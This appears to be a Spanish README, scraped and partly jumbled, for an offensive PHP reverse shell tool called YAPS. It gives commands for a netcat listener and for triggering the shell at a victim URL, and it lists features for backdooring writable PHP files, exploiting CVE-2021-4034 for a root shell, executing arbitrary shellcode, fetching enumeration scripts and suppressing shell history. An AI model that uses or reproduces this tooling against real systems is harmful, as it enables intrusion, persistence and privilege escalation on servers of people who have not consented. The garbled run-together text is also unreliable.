
Yet Another PHP Shell - El shell reverso PHP más completo

Sí, como el nombre lo revela, este es otro shell reverso PHP, uno más entre cientos disponibles, pero con algunas ventajas. Es un solo archivo PHP que contiene todas sus funciones y puedes controlarlo a través de un simple listener TCP (por ejemplo, nc -lp 1337).
En la versión actual (1.5), sus funciones principales solo soportan sistemas Linux, pero estoy planeando hacerlo funcionar también con Windows.
Actualmente está en su primera versión y no lo he probado mucho todavía, y todavía hay muchas cosas que planeo hacer y mejorar para las próximas versiones (¡no está terminado aún!), así que por favor avísame si encuentras algún error o tienes alguna sugerencia de funcionalidad o mejora. =)
!interactive)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s o yaps.php?silent para suprimir el bannerphp yaps.php ip puerto!help - Muestra el menú de ayuda!all-colors - Alternar todos los colores (compatible con TTY sin color)!color - Alternar color de PS1 (solo localmente, no se cambia ninguna variable de entorno)!duplicate - Generar otra conexión YAPS!enum - Descargar LinPEAS y LinEnum a /tmp y dejarlos listos para usar!info - Listar información sobre el objetivo (la enumeración que mencioné arriba)!infect - Infectar archivos PHP modificables con backdoors!interactive - Generar shells reversos interactivos en otros puertos (funciona con sudo, su, mysql, etc.)!passwd - Opción de contraseña (habilitar, deshabilitar, establecer, modificar)!php - Escribir y ejecutar PHP en el host remoto





v1.5 - 12/02/2022
!shellcode para recibir y ejecutar un shellcode arbitrarioduplicate() (ahora puedes especificar un rango de puertos)stabilize a interactivev1.4 - 04/02/2022
!pwnkit para explotar CVE-2021-4034 y generar un shell reverso rootverify_update()v1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect para infectar archivos PHP con backdoors!stabilize (errores corregidos)v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate para generar otro shell--update|-u)--help|-h)php yaps.php ip puerto)v1.1 - 12/07/2021
!all-colors para alternar colores de terminal y funcionar con TTYs sin colorexit para cerrar socket (salir del shell)!stabilize para desactivar HISTSIZE y HISTFILE!infov1.0.1 - 08/07/2021
[x,y,z] a array(x,y,z) para mejorar la compatibilidad con versiones antiguas de PHPAlgunas ideas fueron inspiradas por estas herramientas:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!pwnkit - Intenta explotar CVE-2021-4034 y generar un shell reverso root!shellcode - Enviar y ejecutar shellcode en el host remoto!suggester - Descargar Linux Exploit Suggester a /tmp y dejarlo listo para usar

